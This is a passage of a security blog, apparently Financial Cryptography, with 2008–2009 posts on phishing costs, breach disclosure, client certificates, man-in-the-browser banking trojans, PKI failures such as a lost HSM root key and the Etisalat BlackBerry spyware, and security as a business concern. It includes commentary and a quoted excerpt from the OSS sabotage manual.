    • in average ... approximately 832 a year ... reached users' inboxes.
    • costs estimated at up to $9.4 million per year per million users.
    • based on data colleded from "3 million e-banking users who are customers of 10 sizeable U.S. and European banks."

    The primary source was a survey run by an anti-phishing software vendor, so caveats apply. Still interesting!

    For more meat on the bigger picture, see this article: Ending the PCI Blame Game. Which reads like a compressed version of this blog! Perhaps, finally, the thing that is staring the financial operators in the face has started to hit home, and they are really ready to sound the alarm.

    Posted by iang at 06:35 PM | Comments (1) | TrackBack

    November 26, 2009

    Breaches not as disclosed as much as we had hoped

    One of the brief positive spots in the last decade was the California bill to make breaches of data disclosed to effected customers. It took a while, but in 2005 the flood gates opened. Now reports the FBI:

    "Of the thousands of cases that we've investigated, the public knows about a handful," said Shawn Henry, assistant director for the Federal Bureau of Investigation's Cyber Division. "There are million-dollar cases that nobody knows about."

    That seems to point at a super-iceberg. To some extent this is expected, because companies will search out new methods to bypass the intent of the disclosure laws. And also there is the underlying economics. As has been pointed out by many (or perhaps not many but at least me) the reputation damage probably dwarfs the actual or measurable direct losses to the company and its customers.

    Companies that are victims of cybercrime are reluctant to come forward out of fear the publicity will hurt their reputations, scare away customers and hurt profits. Sometimes they don't report the crimes to the FBI at all. In other cases they wait so long that it is tough to track down evidence.

    So, avoidance of disclosure is the strategy for all properly managed companies, because they are required to manage the assets of their shareholders to the best interests of the shareholders. If you want a more dedicated treatment leading to this conclusion, have a look at "the market for silver bullets" paper.

    Meanwhile, the FBI reports that the big companies have improved their security somewhat, so the attackers direct at smaller companies. And:

    They also target corporate executives and other wealthy public figures who it is relatively easy to pursue using public records. The FBI pursues such cases, though they are rarely made public.

    Huh. And this outstanding coordinated attack:

    A similar approach was used in a scheme that defrauded the Royal Bank of Scotland's (RBS.L: Quote, Profile, Research, Stock Buzz) RBS WorldPay of more than $9 million. A group, which included people from Estonia, Russia and Moldova, has been indicted for compromising the data encryption used by RBS WorldPay, one of the leading payment processing businesses globally.

    The ring was accused of hacking data for payroll debit cards, which enable employees to withdraw their salaries from automated teller machines. More than $9 million was withdrawn in less than 12 hours from more than 2,100 ATMs around the world, the Justice Department has said.

    2,100 ATMs! worldwide! That leaves that USA gang looking somewhat kindergarten, with only 50 ATMs cities. No doubt about it, we're now talking serious networked crime, and I'm not referring to the Internet but the network of collaborating, economic agents.

    Compromising the data encryption, even. Anyone know the specs? These are important numbers. Did I miss this story, or does it prove the FBI's point?

    Posted by iang at 01:23 PM | Comments (0) | TrackBack

    October 19, 2009

    Denial of Service is the greatest bug of most security systems

    I've had a rather troubling rash of blog comment failure recently. Not on FC, which seems to be ok ("to me"), but everywhere else. At about 4 in the last couple of days I'm starting to get annoyed. I like to think that my time in writing blog comments for other blogs is valuable, and sometimes I think for many minutes about the best way to bring a point home.

    But more than half the time, my comment is rejected. The problem is on the one hand overly sophisticated comment boxes that rely on exotica like javascript and SSO through some place or other ... and spam on the other hand.

    These things have destroyed the credibility of the blog world. If you recall, there was a time when people used blogs for _conversations_. Now, most blogs are self-serving promotion tools. Trackbacks are dead, so the conversational reward is gone, and comments are slow. You have to be dedicated to want to follow a blog and put a comment on there, or stupid enough to think your comment matters, and you'll keep fighting the bl**dy javascript box.

    The one case where I know clearly "it's not just me" is John Robb's blog. This was a *fantastic* blog where there was great conversation, until a year or two back. It went from dozens to a couple in one hit by turning on whatever flavour of the month was available in the blog system. I've not been able to comment there since, and I'm not alone.

    This is denial of service. To all of us. And, this denial of service is the greatest evidence of the failure of Internet security. Yet, it is easy, theoretically easy to avoid. Here, it is avoided by the simplest of tricks, maybe one per month comes my way, but if I got spam like others get spam, I'd stop doing the blog. Again denial of service.

    Over on CAcert.org's blog they recently implemented client certs. I'm not 100% convinced that this will eliminate comment spam, but I'm 99.9% convinced. And it is easy to use, and it also (more or less) eliminates that terrible thing called access control, which was delivering another denial of service: the people who could write weren't trusted to write, because the access control system said they had to be access-controlled. Gone, all gone.

    According to the blog post on it:

    The CAcert-Blog is now fully X509 enabled. From never visited the site before and using a named certificate you can, with one click (log in), register for the site and have author status ready to write your own contribution.

    Sounds like a good idea, right? So why don't most people do this? Because they can't. Mostly they can't because they do not have a client certificate. And if they don't have one, there isn't any point in the site owner asking for it. Chicken & egg?

    But actually there is another reason why people don't have a client certificate: it is because of all sorts of mumbo jumbo brought up by the SSL / PKIX people, chief amongst which is a claim that we need to know who you are before we can entrust you with a client certificate ... which I will now show to be a fallacy. The reason client certificates work is this:

    If you only have a WoT unnamed certificate you can write your article and it will be spam controlled by the PR people (aka editors).

    If you had a contributor account and haven’t posted anything yet you have been downgraded to a subscriber (no comment or write a post access) with all the other spammers. The good news is once you log in with a certificate you get upgraded to the correct status just as if you’d registered.

    We don't actually need to know who you are. We only need to know that you are not a spammer, and you are going to write a good article for us. Both of these are more or less an equivalent thing, if you think about it; they are a logical parallel to the CAPTCHA or turing test. And we can prove this easily and economically and efficiently: write an article, and you're in.

    Or, in certificate terms, we don't need to know who you are, we only need to know you are the same person as last time, when you were good.

    This works. It is an undeniable benefit:

    There is no password authentication any more. The time taken to make sure both behaved reliably was not possible in the time the admins had available.

    That's two more pluses right there: no admin de-spamming time lost to us and general society (when there were about 290 in the wordpress click-delete queue) and we get rid of those bl**dy passwords, so another denial of service killed.

    Why isn't this more available? The problem comes down to an inherent belief that the above doesn't work. Which is of course a complete nonsense. 2 weeks later, zero comment spam, and I know this will carry on being reliable because the time taken to get a zero-name client certificate (free, it's just your time involved!) is well in excess of the trick required to comment on this blog.

    No matter the *results*, because of the belief that "last-time-good-time" tests are not valuable, the feature of using client certs is not effectively available in the browser. That which I speak of here is so simple to code up it can actually be tricked from any website to happen (which is how CAs get it into your browser in the first place, some simple code that causes your browser to do it all). It is basically the creation of a certificate key pair within the browser, with a no-name in it. Commonly called the self-signed certificate or SSC, these things can be put into the browser in about 5 seconds, automatically, on startup or on absence or whenever. If you recall that aphorism:

    There is only one mode, and it is secure.

    And contrast it to SSL, we can see what went wrong: there is an *option* of using a client cert, which is a completely insane choice. The choice of making the client certificate optional within SSL is a decision not only to allow insecurity in the mode, but also a decision to promote insecurity, by practically eliminating the use of client certs (see the chicken & egg problem).

    And this is where SSL and the PKIX deliver their greatest harm. It denies simple cryptographic security to a wide audience, in order to deliver ... something else, which it turns out isn't as secure as hoped because everyone selects the wrong option. The denial of service attack is dominating, it's at the level of 99% and beyond: how many blogs do you know that have trouble with comments? How many use SSL at all?

    So next time someone asks you, why these effing passwords are causing so much grief in your support department, ask them why they haven't implemented client certs? Or, why the spam problem is draining your life and destroying your social network? Client certs solve that problem.

    SSL security is like Bismarck's sausages: "making laws is like making sausages, you don't want to watch them being made." The difference is, at least Bismark got a sausage!

    Footnote: you're probably going to argue that SSCs will be adopted by the spammer's brigade once there is widespread use of this trick. Think for minute before you post that comment, the answer is right there in front of your nose! Also you are probably going to mention all these other limitations of the solution. Think for another minute and consider this claim: almost all of the real limitations exist because the solution isn't much used. Again, chicken & egg, see "usage". Or maybe you'll argue that we don't need it now we have OpenID. That's specious, because we don't actually have OpenID as yet (some few do, not all) and also, the presence of one technology rarely argues against another not being needed, only marketing argues like that.

    Posted by iang at 10:47 AM | Comments (6) | TrackBack

    October 01, 2009

    Man-in-the-Browser goes to court

    Stephen Mason reports that MITB is in court:

    A gang of internet fraudsters used a sophisticated virus to con members of the public into parting with their banking details and stealing £600,000, a court heard today.

    Once the 'malicious software' had infected their computers, it waited until users logged on to their accounts, checked there was enough money in them and then insinuated itself into cash transfer procedures.

    (also on El Reg.) This breaches the 2-factor authentication system commonly in use because it (a) controls the user's PC, and (b) the authentication scheme that was commonly pushed out over the last decade or so only authenticates the user, not the transaction. So as the trojan now controls the PC, it is the user. And the real user happily authenticates itself, and the trojan, and the trojan's transactions, and even lies about it!

    Numbers, more than ordinarily reliable because they have been heard in court:

    'In fact as a result of this Trojan virus fraud very many people - 138 customers - were affected in this way with some £600,000 being fraudulently transferred.

    'Some of that money, £140,000, was recouped by NatWest after they became aware of this scam.'

    This is called Man-in-the-browser, which is a subtle reference to the SSL's vaunted protection against Man-in-the-middle. Unfortunately several things went wrong in this area of security: Adi's 3rd law of security says the attacker always bypasses; one of my unnumbered aphorisms has it that the node is always the threat, never the wire, and finally, the extraordinary success of SSL in the mindspace war blocked any attempts to fix the essential problems. SSL is so secure that nobody dare challenge browser security.

    The MITB was first reported in March 2006 and sent a wave of fear through the leading European banks. If customers lost trust in the online banking, this would turn their support / branch employment numbers on their heads. So they rapidly (for banks) developed a counter-attack by moving their confirmation process over to the SMS channel of users' phones. The Man-in-the-browser cannot leap across that air-gap, and the MITB is more or less defeated.

    European banks tend to be proactive when it comes to security, and hence their losses are miniscule. Reported recently was something like €400k for a smaller country (7 million?) for an entire year for all banks. This one case in the UK is double that, reflecting that British banks and USA banks are reactive to security. Although they knew about it, they ignored it.

    This could be called the "prove-it" school of security, and it has merit. As we saw with SSL, there never really was much of a threat on the wire; and when it came to the node, we were pretty much defenceless (although a lot of that comes down to one factor: Microsoft Windows). So when faced with FUD from the crypto / security industry, it is very very hard to separate real dangers from made up ones. I felt it was serious; others thought I was spreading FUD! Hence Philipp Güring's paper Concepts against Man-in-the-Browser Attacks, and the episode formed fascinating evidence for the market for silver bullets. The concept is now proven right in practice, but it didn't turn out how we predicted.

    What is also interesting is that we now have a good cycle timeline: March 2006 is when the threat first crossed our radars. September 2009 it is in the British courts.

    Postscript. More numbers from today's MITB:

    A next-generation Trojan recently discovered pilfering online bank accounts around the world kicks it up a notch by avoiding any behavior that would trigger a fraud alert and forging the victim's bank statement to cover its tracks.

    The so-called URLZone Trojan doesn't just dupe users into giving up their online banking credentials like most banking Trojans do: Instead, it calls back to its command and control server for specific instructions on exactly how much to steal from the victim's bank account without raising any suspicion, and to which money mule account to send it the money. Then it forges the victim's on-screen bank statements so the person and bank don't see the unauthorized transaction.

    Researchers from Finjan found the sophisticated attack, in which the cybercriminals stole around 200,000 euro per day during a period of 22 days in August from several online European bank customers, many of whom were based in Germany....

    "The Trojan was smart enough to be able to look at the [victim's] bank balance," says Yuval Ben-Itzhak, CTO of Finjan... Finjan found the attackers had lured about 90,000 potential victims to their sites, and successfully infected about 6,400 of them. ...URLZone ensures the transactions are subtle: "The balance must be positive, and they set a minimum and maximum amount" based on the victim's balance, Ben-Itzhak says. That ensures the bank's anti-fraud system doesn't trigger an alert, he says.

    And the malware is making the decisions -- and alterations to the bank statement -- in real time, he says. In one case, the attackers stole 8,576 euro, but the Trojan forged a screen that showed the transferred amount as 53.94 euro. The only way the victim would discover the discrepancy is if he logged into his account from an uninfected machine.

    Posted by iang at 09:26 AM | Comments (1) | TrackBack

    September 14, 2009

    OSS on how to run a business

    After a rather disastrous meeting a few days ago, I finally found the time to load up:

    OSS's Simple Sabotage Field Manual

    The Office of Strategic Services was the USA dirty tricks brigade of WWII, which later became the CIA. Their field manual was declassified and published, and, lo and behold, it includes some mighty fine advice. This manual was noticed to the world by the guy who presented the story of the CIA's "open intel" wiki, he thought it relevant I guess.

    Sections 11, 12 are most important to us, the rest concentrating on the physical spectrum of blowing up stuff. Onwards:

    (11) General Interference with Organizations and Production


    (a) Organizations and Conferences

    (1) Insist on doing everything through "channels." Never permit short-cuts to be taken in order to, expedite decisions.

    (2) Make "speeches." Talk as frequently as possible and at great length. Illustrate your "points" by long anecdotes and accounts of personal experiences. Never hesitate to make a few appropriate "patriotic" comments.

    (3) When possible, refer all matters to committees, for "further study and consideration." Attempt to make the committees as large as possible - never less than five.

    (4) Bring up irrelevant issues as frequently as possible.

    (5) Haggle over precise wordings of communications, minutes, resolutions.

    (6) Refer back to matters decided upon at the last meeting and attempt to reopen the question of the advisability of that decision.

    (7) Advocate "caution." Be "reasonable" and urge your fellow-conferees to be "reasonable" and avoid haste which might result in embarrassments or difficulties later on.


    (8) Be worried about the propriety of any decision -raise the question of whether such action as is contemplated lies within the jurisdiction of the group or whether it might conflict with the policy of some higher echelon.


    Read the full sections 11,12 and for reference, also the entire manual. As some have suggested, it reads like a modern management manual, perhaps proving that people don't change over time!

    Posted by iang at 09:42 PM | Comments (1) | TrackBack

    September 02, 2009

    Robert Garigue and Charlemagne as a model of infosec

    Gunnar reports that someone called Robert Garigue died last month. This person I knew not, but his model resonates. Sound bites only from Gunnar's post:

    "It's the End of the CISO As We Know It (And I Feel Fine)"...

    ...First, they miss the opportunity to look at security as a business enabler. Dr. Garigue pointed out that because cars have brakes, we can drive faster. Security as a business enabler should absolutely be the starting point for enterprise information security programs.
    ...

    Secondly, if your security model reflects some CYA abstraction of reality instead of reality itself your security model is flawed. I explored this endemic myopia...

    This rhymes with: "what's your business model?" The bit lacking from most orientations is the enabler, why are we here in the first place? It's not to show the most elegant protocol for achieving C-I-A (confidentiality, integrity, authenticity), but to promote the business.

    How do we do that? Well, most technologists don't understand the business, let alone can speak the language. And, the business folks can't speak the techno-crypto blah blah either, so the blame is fairly shared. Dr. Garigue points us to Charlemagne as a better model:

    King of the Franks and Holy Roman Emperor; conqueror of the Lombards and Saxons (742-814) - reunited much of Europe after the Dark Ages.

    He set up other schools, opening them to peasant boys as well as nobles. Charlemagne never stopped studying. He brought an English monk, Alcuin, and other scholars to his court - encouraging the development of a standard script.

    He set up money standards to encourage commerce, tried to build a Rhine-Danube canal, and urged better farming methods. He especially worked to spread education and Christianity in every class of people.

    He relied on Counts, Margraves and Missi Domini to help him.

    Margraves - Guard the frontier districts of the empire. Margraves retained, within their own jurisdictions, the authority of dukes in the feudal arm of the empire.

    Missi Domini - Messengers of the King.

    In other words, the role of the security person is to enable others to learn, not to do, nor to critique, nor to design. In more specific terms, the goal is to bring the team to a better standard, and a better mix of security and business. Garigue's mandate for IT security?

    Knowledge of risky things is of strategic value

    How to know today tomorrow’s unknown ?

    How to structure information security processes in an organization so as to identify and address the NEXT categories of risks ?

    Curious, isn't it! But if we think about how reactive most security thinking is these days, one has to wonder where we would ever get the chance to fight tomorrow's war, today?

    Posted by iang at 10:45 PM | Comments (1) | TrackBack

    July 15, 2009

    trouble in PKI land

    The CA and PKI business is busy this week. CAcert, a community Certification Authority, has a special general meeting to resolve the trauma of the collapse of their audit process. Depending on who you ask, my resignation as auditor was either the symptom or the cause.

    In my opinion, the process wasn't working, so now I'm switching to the other side of the tracks. I'll work to get the audit done from the inside. Whether it will be faster or easier this way is difficult to say, we only get to run the experiment once.

    Meanwhile, Mike Zusman and Alex Sotirov are claiming to have breached the EV green bar thing used by some higher end websites. No details available yet, it's the normal tease before a BlabHat style presentation by academics. Rumour has it that they've exploited weaknesses in the browsers. Some details emerging:

    With control of the DNS for the access point, the attackers can establish their machines as men-in-the-middle, monitoring what victims logged into the access point are up to. They can let victims connect to EV SSL sites - turning the address bars green. Subsequently, they can redirect the connection to a DV SSL sessions under a certificates they have gotten illicitly, but the browser will still show the green bar.

    Ah that old chestnut: if you slice your site down the middle and do security on the left and no or lesser security on the right, guess where the attacker comes in? Not the left or the right, but up the middle, between the two. He exploits the gap. Which is why elsewhere, we say "there is only one mode and it is secure."

    Aside from that, this is an interesting data point. It might be considered that this is proof that the process is working (following the GP theory), or it might be proof that the process is broken (following the sleeping-dogs-lie model of security).

    Although EV represents a good documentation of what the USA/Canada region (not Europe) would subscribe as "best practices," it fails in some disappointing ways. And in some ways it has made matters worse. Here's one: because the closed proprietary group CA/B Forum didn't really agree to fix the real problems, those real problems are still there. As Extended Validation has held itself up as a sort of gold standard, this means that attackers now have something fun to focus on. We all knew that SSL was sort of facade-ware in the real security game, and didn't bother to mention it. But now that the bigger CAs have bought into the marketing campaign, they'll get a steady stream of attention from academics and press.

    I would guess less so from real attackers, because there are easier pickings elsewhere, but maybe I'm wrong:

    "From May to June 2009 the total number of fraudulent website URLs using VeriSign SSL certificates represented 26% of all SSL certificate attacks, while the previous six months presented only a single occurrence," Raza wrote on the Symantec Security blogs.

    ... MarkMonitor found more than 7,300 domains exploited four top U.S. and international bank brands with 16% of them registered since September 2008.
    .... But in the latest spate of phishing attempts, the SSL certificates were legitimate because "they matched the URL of the fake pages that were mimicking the target brands," Raza wrote.

    VeriSign Inc., which sells SSL certificates, points out that SSL certificate fraud currently represents a tiny percentage of overall phishing attacks. Only two domains, and two VeriSign certificates were compromised in the attacks identified by Symantec, which targeted seven different brands.

    "This activity falls well within the normal variability you would see on a very infrequent occurrence," said Tim Callan, a product marketing executive for VeriSign's SSL business unit. "If these were the results of a coin flip, with heads yielding 1 and tails yielding 0, we wouldn't be surprised to see this sequence at all, and certainly wouldn't conclude that there's any upward trend towards heads coming up on the coin."

    Well, we hope that nobody's head is flipped in an unsurprising fashion....

    It remains to be seen whether this makes any difference. I must admit, I check the green bar on my browser when online-banking, but annoyingly it makes me click to see who signed it. For real users, Firefox says that it is the website, and this is wrong and annoying, but Mozilla has not shown itself adept at understanding the legal and business side of security. I've heard Safari has been fixed up so probably time to try that again and report sometime.

    Then, over to Germany, where a snafu with a HSM ("high security module") caused a root key to be lost (also in German). Over in the crypto lists, there are PKI opponents pointing out how this means it doesn't work, and there are PKI proponents pointing out how they should have employed better consultants. Both sides are right of course, so what to conclude?

    Test runs with Germany's first-generation electronic health cards and doctors' "health professional cards" have suffered a serious setback. After the failure of a hardware security module (HSM) holding the private keys for the root Certificate Authority (root CA) for the first-generation cards, it emerged that the data had not been backed up. Consequently, if additional new cards are required for field testing, all of the cards previously produced for the tests will have to be replaced, because a new root CA will have to be generated. ... Besides its use in authentication, the root CA is also important for card withdrawal (the revocation service).

    The first thing to realise was that this was a test rollout and not the real thing. So the test discovered a major weakness; in that sense it is successful, albeit highly embarrassing because it reached the press.

    The second thing is the HSM issue. As we know, PKI is constructed as a hierarchy, or a tree. At the root of the tree is the root key of course. If this breaks, everything else collapses.

    Hence there is a terrible fear of the root breaking. This feeds into the wishes of suppliers of high security modules, who make hardware that protect the root from being stolen. But, in this case, the HSM broke, and there was no backup. So a protection for one fear -- theft -- resulted in a vulnerability to another fear -- data loss.

    A moment's thought and we realise that the HSM has to have a backup. Which has to be at least as good as the HSM. Which means we then have some rather cute conundrums, based on the Alice in Wonderland concept of having one single root except we need multiple single roots... In practice, how do we create the root inside the HSM (for security protection) and get it to another HSM (for recovery protection)?

    Serious engineers and architects will be reaching for one word: BRITTLE! And so it is. Yes, it is possible to do this, but only by breaking the hierarchical principle of PKI itself. It is hard to break fundamental principles, and the result is that PKI will always be brittle, the implementations will always have contradictions that are swept under the carpet by the managers, auditors and salesmen. The PKI design is simply not real world engineering, and the only thing that keeps it going is the institutional deadly embrace of governments, standards committees, developers and security companies.

    Not the market demand. But, not all has been bad in the PKI world. Actually, since the bottoming out of the dotcom collapse, certs have been on the uptake, and market demand is present albeit not anything beyond compliance-driven. Here comes a minor item of success:

    VeriSign, Inc. [SNIP] today reported it has topped the 1 billion mark for daily Online Certificate Status Protocol (OCSP) checks.

    [SNIP] A key link in the online security chain, OCSP offers the most timely and efficient way for Web browsers to determine whether a Secure Sockets Layer (SSL) or user certificate is still valid or has been revoked. Generally, when a browser initiates an SSL session, OCSP servers receive a query to check to see if the certificate in use is valid. Likewise, when a user initiates actions such as smartcard logon, VPN access or Web authentication, OCSP servers check the validity of the user certificate that is presented. OSCP servers are operated by Certificate Authorities, and VeriSign is the world's leading Certificate Authority.

    [SNIP] VeriSign is the EV SSL Certificate provider of choice for more than 10,000 Internet domain names, representing 74 percent of the entire EV SSL Certificate market worldwide.

    (In the above, I've snipped the self-serving marketing and one blatant misrepresentation.)

    Certificates are static statements. They can be revoked, but the old design of downloading complete lists of all revocations was not really workable (some CAs ship megabyte-sized lists). We now have a new thing whereby if you are in possession of a certificate, you can do an online check of its status, called OCSP.

    The fundamental problem with this, and the reason why it took the industry so long to get around to making revocation a real-time thing, is that once you have that architecture in place, you no longer need certificates. If you know the website, you simply go to a trusted provider and get the public key. The problem with this approach is that it doesn't allow the CA business to sell certificates to web site owners. As it lacks any business model for CAs, the CAs will fight it tooth & nail.

    Just another conundrum from the office of security Kafkaism.

    Here's another one, this time from the world of code signing. The idea is that updates and plugins can be sent to you with a digital signature. This means variously that the code is good and won't hurt you, or someone knows who the attacker is, and you can't hurt him. Whatever it means, developers put great store in the apparent ability of the digital signature to protect themselves from something or other.

    But it doesn't work with Blackberry users. Allegedly, a Blackberry provider sent a signed code update to all users in United Arab Emirates:

    Yesterday it was reported by various media outlets that a recent BlackBerry software update from Etisalat (a UAE-based carrier) contained spyware that would intercept emails and text messages and send copies to a central Etisalat server. We decided to take a look to find out more.

    ...
    Whenever a message is received on the device, the Recv class first inspects it to determine if it contains an embedded command — more on this later. If not, it UTF-8 encodes the message, GZIPs it, AES encrypts it using a static key (”EtisalatIsAProviderForBlackBerry”), and Base64 encodes the result. It then adds this bundle to a transmit queue. The main app polls this queue every five seconds using a Timer, and when there are items in the queue to transmit, it calls this function to forward the message to a hardcoded server via HTTP (see below). The call to http.sendData() simply constructs the POST request and sends it over the wire with the proper headers.

    Oops! A signed spyware from the provider that copies all your private email and sends it to a server. Sounds simple, but there's a gotcha...

    The most alarming part about this whole situation is that people only noticed the malware because it was draining their batteries. The server receiving the initial registration packets (i.e. “Here I am, software is installed!”) got overloaded. Devices kept trying to connect every five seconds to empty the outbound message queue, thereby causing a battery drain. Some people were reporting on official BlackBerry forums that their batteries were being depleted from full charge in as little as half an hour.

    So, even though the spyware provider had a way to turn it on and off:

    It doesn’t seem to execute arbitrary commands, just packages up device information such as IMEI, IMSI, phone number, etc. and sends it back to the central server, the same way it does for received messages. It also provides a way to remotely enable/disable the spyware itself using the commands “start” and “stop”.

    There was something wrong with the design, and everyone's blackberry went mad. Two points: if you want to spy on your own customers, be careful, and test it. Get quality engineers on to that part, because you are perverting a brittle design, and that is tricky stuff.

    Second point. If you want to control a large portion of the population who has these devices, the centralised hierarchy of PKI and its one root to bind them all principle would seem to be perfectly designed. Nobody can control it except the center, which puts you in charge. In this case, the center can use its powerful code-signing abilities to deliver whatever you trust to it. (You trust what it tells you to trust, of course.)

    Which has led some wits to label the CAs as centralised vulnerability partners. Which is odd, because some organisations that should know better than to outsource the keys to their security continue to do so.

    But who cares, as long as the work flows for the consultants, the committees, the HSM providers and the CAs?

    Posted by iang at 07:13 AM | Comments (7) | TrackBack

    March 12, 2009

    We don't fear no black swan!

    Over on EC, Adam does a presentation on his new book, co-authored with Andrew Stewart. AFAICS, the basic message in the book is "security sucks, we better start again." Right, no argument there.

    Curiously, he's also experimenting with Twitter in the presentations as a "silent" form of interaction (more. It is rather poignant to mix twitter and security, but I generally like these experiments. The grey hairs don't understand this new stuff, and they have to find out somehow. Somehow and sometime, the only question is whether we are the dinosours or the mammals.

    Reading through the quotes (standard stuff) I came across this one, unattributed:

    I was pretty dismissive of "Black Swan" hype. I stand by that, and don't think we should allow fear of a black swan out there somewhere to prevent us from studying white ones and generalizing about what we can see.

    OK, we just saw the Black Swan over on the finance scene, where Wall Street is now turning into Rubble Alley. Why not on the net? Black swans are a name for those areas where our numbers are garbage and our formulas have an occasional tendency (say 1%) to blow up.

    Here's why there are no black swans on the net, for my money: there is no unified approach to security. Indeed, there isn't much or anything of security. There are tiny fights by tiny schools, but these are unadopted by the majority. Although there are a million certs out there, they play no real part in the security models of the users. A million OpenPGP keys are used for collecting signatures, not for securing data. Although there are hundreds of millions of lines of security code out there, now including fresh new Vista!, they are mostly ignored or bypassed or turned off or any other of the many Kerckhoffsian modes of failure.

    The vast majority of the net is insecure. We ain't got no security, we don't fear no black swan. We're about as low as we can get. If I look at the most successful security product of all time, Skype, it's showing around 10 million users right now. Facebook, Myspace, youtube, google, you name them, they *all* do an order of magnitude better than Skype's ugly duckling waddle.

    Why is the state of security so dire? Well, we could ask the DHS. Now, these guys are probably authoritive in at least a negative sense, because they actually were supposed to secure the USA government infrastructure. Here's what one guy says, thanks to Todd who passed this on:

    The official in charge of coordinating the U.S. government's cybersecurity operations has quit, saying the expanding control of the National Security Agency over the nation's computer security efforts poses "threats to our democratic processes."

    "Even from a security standpoint," Rod Beckstrom, the head of the Department of Homeland Security's National Cyber Security Center, told United Press International, "it is unwise to hand over the security of all government networks to a single organization."

    "If our founding fathers were taking part in this debate (about the future organization of the government's cybersecurity activities) there is no doubt in my mind they would support a separation of security powers among different (government) organizations, in line with their commitment to checks and balances."

    In a letter to Homeland Security Secretary Janet Napolitano last week, Beckstrom said the NSA "dominates most national cyber efforts" and "effectively controls DHS cyber efforts through detailees, technology insertions and the proposed move" of the NCSC to an NSA facility at the agency's Fort Meade, Md., headquarters.

    It's called "the equity debate" for reasons obscure. Basically, the mission of the NSA is to breach our security. The theory has it that the NSA did this (partly) by ensuring that our security -- the security of the entire net -- was flaky enough for them to get in. Now we all pay the price, as the somewhat slower but more incisive criminal economy takes its tax.

    Quite how we get from that above NSA mission to where we are now is a rather long walk, and to be fair, the evidence is a bit scattered and tenuous. Unsurprisingly, and the above resignation does not quite "spill the beans," thus preserving the beanholder's good name. But it is certainly good to see someone come out and say, these guys are ruining the party for all of us.

    Posted by iang at 07:00 PM | Comments (4) | TrackBack

    January 16, 2009

    What's missing in security: business

    Those of us who are impacted by the world of security suffer under a sort of love-hate relationship with the word; so much of it is how we build applications, but so much of what is labelled security out there in the rest of the world is utter garbage.

    So we tend to spend a lot of our time reverse-engineering popular security thought and finding the security bugs in it. I think I've found another one. Consider this very concise and clear description from Frank Stajano, who has published a draft book section seeking comments:

    The viewpoint we shall adopt here, which I believe is the only one leading to robust system security engineering, is that security is essentially risk management. In the context of an adversarial situation, and from the viewpoint of the defender, we identify assets (things you want to protect, e.g. the collection of magazines under your bed), threats (bad things that might happen, e.g. someone stealing those magazines), vulnerabilities (weaknesses that might facilitate the occurrence of a threat, e.g. the fact that you rarely close the bedroom window when you go out), attacks (ways a threat can be made to happen, e.g. coming in through the open window and stealing the magazines—as well as, for good measure, that nice new four-wheel suitcase of yours to carry them away with) and risks (the expected loss caused by each attack, corresponding to the value of the asset involved times the probability that the attack will occur). Then we identify suitable safeguards (a priori defences, e.g. welding steel bars across the window to prevent break-ins) and countermeasures (a posteriori defences, e.g. welding steel bars to the window after a break-in has actually occurred4 , or calling the police). Finally, we implement the defences that are still worth implementing after evaluating their effectiveness and comparing their (certain) cost with the (uncertain) risk they mitigate5

    (my emphasies.) That's a good description of how the classical security world sees it. We start by saying, "What's your threat model?" Then out of that we build a security model to deal with those threats. The security model then incorporates some knowledge of risks to manage the tradeoffs.

    The bit that's missing is the business. Instead of asking "What's your threat model?" as the first question, it should be "What's your business model?" Security asks that last, and only partly, by asking questions like "what's are the risks?"

    Calling security "risk management" then is a sort of nod to the point that security has a purpose within business; and by focussing on some risks, this allows the security modellists to preserve their existing model while tying it to the business. But it is still backwards; it is still seeking to add risks at the end, and will still result in "security" being just the annoying monkey on the back.

    Instead, the first question should be "What's your business model?"

    This unfortunately opens Pandora's box, because that implies that we can understand a business model. Assuming it is the case that your CISO understands a business model, it does rather imply that the only security we should be pushing is that which is from within. From inside the business, that is. The job of the security people is not therefore to teach and build security models, but to improve the abilities of the business people to incorporate good security as they are doing their business.

    Which perhaps brings us full circle to the popular claim that the best security is that which is built in from the beginning.

    Posted by iang at 03:51 AM | Comments (4) | TrackBack

    December 07, 2008

    Security is a subset of Reliability

    From the "articles I wish I'd written" department, Chandler points to an article by Daniels Geer & Conway on all the ways security is really a subset of reliability. Of course!

    I think this is why the best engineers who've done great security things start from the top; from the customer, the product, the market. They know that in order to secure something, they had better know what the something is before even attempting to add a cryptosec layer over it.

    Which is to say, security cannot be a separate discipline. It can be a separate theory, a bit like statics is a theory from civil engineering, or triage is a part of medicine. You might study it in University, but you don't get a job in it; every practitioner needs some basic security. If you are a specialist in security, your job is more or less to teach it to practitioners. The alternate is to ask the practitioners to teach you about the product, which doesn't seem sensible.

    Posted by iang at 07:12 PM | Comments (1) | TrackBack

    Unwinding secrecy -- how to do it?

    The next question on unwinding secrecy is how to actually do it. It isn't as trivial as it sounds. Perhaps this is because the concept of "need-to-know" is so well embedded in the systems and managerial DNA that it takes a long time to root it out.

    At LISA I was asked how to do this; but I don't have much of an answer. Here's what I have observed:

    • Do a little at a time.
    • Pick a small area and start re-organising it. Choose an area where there is lots of frustration and lots of people to help. Open it up by doing something like a wiki, and work the information. It will take a lot of work and pushing by yourself, mostly because people won't know what you are doing or why (even if you tell them).
    • What is needed is a success. That is, a previously secret area is opened up, and as a result, good work gets done that was otherwise inhibited. People need to see the end-to-end journey in order to appreciate the message. (And, obviously, it should be clear at the end of it that you don't need the secrecy as much as you thought.)
    • Whenever some story comes out about a successful opening of secrecy, spread it around. The story probably isn't relevant to your organisation, but it gets people thinking about the concept. E.g., that which I posted recently was done to get people thinking. Another from Chandler.
    • Whenever there is a success on openness inside your organisation, help to make this a showcase (here are three). Take the story and spread it around; explain how the openness made it possible.
    • When some decision comes up about "and this must be kept secret," discuss it. Challenge it, make it prove itself. Remind people that we are an open organisation and there is benefit in treating all as open as possible.
    • Get a top-level decision that "we are open." Make it broad, make it serious, and incorporate the exceptions. "No, we really are open; all of our processes are open except when a specific exception is argued for, and that must be documented and open!" Once this is done, from top-level, you can remind people in any discussion. This might take years to get, so have a copy of a resolution in your back pocket for a moment when suddenly, the board is faced with it, and minded to pass a broad, sweeping decision.
    • Use phrases like "security-by-obscurity." Normally, I am not a fan of these as they are very often wrongly used; so-called security-by-obscurity often tans the behinds of supposed open standards models. But it is a useful catchphrase if it causes the listener to challenge the obscure security benefits of secrecy.
    • Create an opening protocol. Here's an idea I have seen: when someone comes across a secret document (generally after much discussion ...) that should not have been kept secret, let them engage in the Opening-Up Protocol without any further ado. Instead of grumbling or asking, put the ball in their court. Flip it around, and take the default as to be open:
      "I can't see why document X is secret, it seems wrong. Therefore, in 1 month, I intend to publish it. If there is any real reason, let me know before then."
